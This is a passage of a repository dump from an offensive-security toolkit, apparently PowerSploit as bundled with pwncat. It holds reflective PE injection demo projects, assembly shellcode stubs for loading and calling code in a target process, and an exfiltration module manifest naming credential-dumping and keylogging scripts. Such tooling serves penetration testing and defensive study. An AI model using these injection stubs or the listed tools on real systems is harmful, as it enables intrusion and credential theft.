16 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64
17 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64
18 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32
19 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32
20 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64
21 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 |
6 | using namespace std;
7 |
8 | extern "C" __declspec( dllexport ) void VoidFunc();
9 |
10 |
11 | extern "C" __declspec( dllexport ) void VoidFunc()
12 | {
13 | ofstream myfile;
14 | _mkdir("c:\\ReflectiveLoaderTest");
15 | myfile.open ("c:\\ReflectiveLoaderTest\\DllVoidFunction.txt");
16 | myfile << "Dll Void function successfully called.\n";
17 | myfile.close();
18 | return;
19 | }
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | using namespace std;
5 |
6 | BOOL APIENTRY DllMain( HMODULE hModule,
7 | DWORD ul_reason_for_call,
8 | LPVOID lpReserved
9 | )
10 | {
11 | ofstream myfile;
12 |
13 | switch (ul_reason_for_call)
14 | {
15 | case DLL_PROCESS_ATTACH:
16 | _mkdir("c:\\ReflectiveLoaderTest");
17 | myfile.open ("c:\\ReflectiveLoaderTest\\DllMain.txt");
18 | myfile << "DllMain successfully called.\n";
19 | myfile.close();
20 | break;
21 | case DLL_THREAD_ATTACH:
22 | case DLL_THREAD_DETACH:
23 | case DLL_PROCESS_DETACH:
24 | break;
25 | }
26 | return TRUE;
27 | }
28 |
29 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL_RemoteProcess.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 | // TODO: reference additional headers your program requires here
20 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | printf("Exe loaded! Printing argc and argv\n\n");
12 |
13 | printf("Argc: %d\n", argc);
14 | printf("ArgvAddress: %d\n", argv);
15 |
16 | for (int i = 0; i < argc; i++)
17 | {
18 | wprintf(L"Argv: %s\n", argv[i]);
19 | }
20 |
21 | printf("Exiting exe\n");
22 |
23 | return 0;
24 | }
25 |
26 |
27 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MD Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MD application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MD application.
9 |
10 |
11 | DemoExe_MD.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MD.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MD.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MD.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MD.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | printf("Exe loaded! Printing argc and argv\n\n");
12 |
13 | printf("Argc: %d\n", argc);
14 | printf("ArgvAddress: %d\n", argv);
15 |
16 | for (int i = 0; i < argc; i++)
17 | {
18 | wprintf(L"Argv: %s\n", argv[i]);
19 | }
20 |
21 | printf("Exiting exe\n");
22 |
23 | return 0;
24 | }
25 |
26 |
27 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MDd Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MDd application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MDd application.
9 |
10 |
11 | DemoExe_MDd.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MDd.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MDd.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MDd.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExeToInjectInTo", "ExeToInjectInTo\ExeToInjectInTo.vcxproj", "{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32
14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32
15 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp:
--------------------------------------------------------------------------------
1 | // ExeToInjectInTo.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | printf("Press enter to close.\n");
12 | getchar();
13 |
14 | return 0;
15 | }
16 |
17 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : ExeToInjectInTo Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this ExeToInjectInTo application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your ExeToInjectInTo application.
9 |
10 |
11 | ExeToInjectInTo.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | ExeToInjectInTo.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | ExeToInjectInTo.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // ExeToInjectInTo.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt:
--------------------------------------------------------------------------------
1 | This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included beause I didn't save it, this should just be for the SUPER easy stuff like moving an address to EAX and returning.
2 |
3 | Compile:
4 | x64:
5 | nasm -f elf64 FileName.asm
6 | ld -o FileName FileName.o
7 | objdump -M intel -d FileName
8 |
9 | x86:
10 | nasm FileName.asm
11 | ld -o FileName FileName.o
12 | objdump -M intel -d FileName
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 | global _start
3 |
4 | _start:
5 | ; Get stack setup
6 | push rbx
7 | mov rbx, rsp
8 | and sp, 0xff00
9 |
10 | ; Call DllMain
11 | mov rcx, 0x4141414141414141 ; DLLHandle, set by PowerShell
12 | mov rdx, 0x1 ; PROCESS_ATTACH
13 | mov r8, 0x0 ; NULL
14 | mov rax, 0x4141414141414141 ; Address of DllMain, set by PS
15 | call rax
16 |
17 | ; Fix stack
18 | mov rsp, rbx
19 | pop rbx
20 | ret
21 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Set a var to 1, let PS known exe is exiting
7 | mov rbx, 0x4141414141414141
8 | mov [rbx], byte 0x01
9 |
10 | ; Call exitthread instead of exitprocess
11 | sub rsp, 0xc0
12 | and sp, 0xFFf0 ; Needed for stack alignment
13 | mov rbx, 0x4141414141414141
14 | call rbx
15 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save state of rbx and stack
7 | push rbx
8 | mov rbx, rsp
9 |
10 | ; Set up stack for function call to GetProcAddress
11 | sub rsp, 0x20
12 | and sp, 0xffc0
13 |
14 | ; Call getprocaddress
15 | mov rcx, 0x4141414141414141 ; DllHandle, set by PS
16 | mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS
17 | mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS
18 | call rax
19 |
20 | ; Store the result
21 | mov rcx, 0x4141414141414141 ; Ptr to buffer to save result,set by PS
22 | mov [rcx], rax
23 |
24 | ; Restore stack
25 | mov rsp, rbx
26 | pop rbx
27 | ret
28 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save rsp and setup stack for function call
7 | push rbx
8 | mov rbx, rsp
9 | sub rsp, 0x20
10 | and sp, 0xffc0
11 |
12 | ; Call LoadLibraryA
13 | mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS
14 | mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS
15 | call rdx
16 |
17 | mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS
18 | mov [rdx], rax
19 |
20 | ; Fix stack
21 | mov rsp, rbx
22 | pop rbx
23 | ret
24 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 | global _start
3 |
4 | _start:
5 | ; Get stack setup
6 | push ebx
7 | mov ebx, esp
8 | and esp, 0xfffffff0
9 |
10 | ; Call DllMain
11 | mov ecx, 0x41414141 ; DLLHandle, set by PowerShell
12 | mov edx, 0x1 ; PROCESS_ATTACH
13 | mov eax, 0x0 ; NULL
14 | push eax
15 | push edx
16 | push ecx
17 | mov eax, 0x41414141 ; Address of DllMain, set by PS
18 | call eax
19 |
20 | ; Fix stack
21 | mov esp, ebx
22 | pop ebx
23 | ret
24 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 | global _start
3 |
4 | _start:
5 | ; Set a var to 1, let PS know the EXE is exiting
6 | mov ebx, 0x41414141
7 | mov [ebx], byte 0x01
8 |
9 | ; Call exitthread instead of exit process
10 | sub esp, 0x20
11 | and esp, 0xFFFFFFc0 ; Needed for stack alignment
12 | mov ebx, 0x41414141
13 | call ebx
14 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save state of ebx and stack
7 | push ebx
8 | mov ebx, esp
9 |
10 | ; Align stack
11 | and esp, 0xffffffc0
12 |
13 | ; Call GetProcAddress
14 | mov eax, 0x41414141 ; DllHandle, supplied by PS
15 | mov ecx, 0x41414141 ; Function name, supplied by PS
16 | push ecx
17 | push eax
18 | mov eax, 0x41414141 ; GetProcAddress address, supplied by PS
19 | call eax
20 |
21 | ; Write GetProcAddress return value to an address supplied by PS
22 | mov ecx, 0x41414141 ; Address supplied by PS
23 | mov [ecx], eax
24 |
25 | ; Fix stack
26 | mov esp, ebx
27 | pop ebx
28 | ret
29 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire CodeExecution folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module CodeExecution`
7 |
8 | To see the commands imported, type `Get-Command -Module CodeExecution`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/Exfiltration.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Exfiltration.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Exfiltration Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Format files (.ps1xml) to be loaded when importing this module
25 | FormatsToProcess = 'Get-VaultCredential.ps1xml'
26 |
27 | # Functions to export from this module
28 | FunctionsToExport = '*'
29 |
30 | # List of all files packaged with this module
31 | FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
32 | 'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1',
33 | 'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1',
34 | 'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml',
35 | 'Get-MicrophoneAudio.ps1', 'Get-GPPAutologon.ps1'
36 |
37 | }
38 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/Exfiltration.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/Get-VaultCredential.ps1xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | VaultItemView
6 |
7 | VAULTCLI.VAULTITEM
8 |
9 |
10 |
11 |
12 |
13 |
14 | Vault
15 |
16 |
17 | Resource
18 |
19 |
20 | Identity
21 |
22 |
23 | Credential
24 |
25 |
26 | PackageSid
27 |
28 |
29 | LastModified
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32
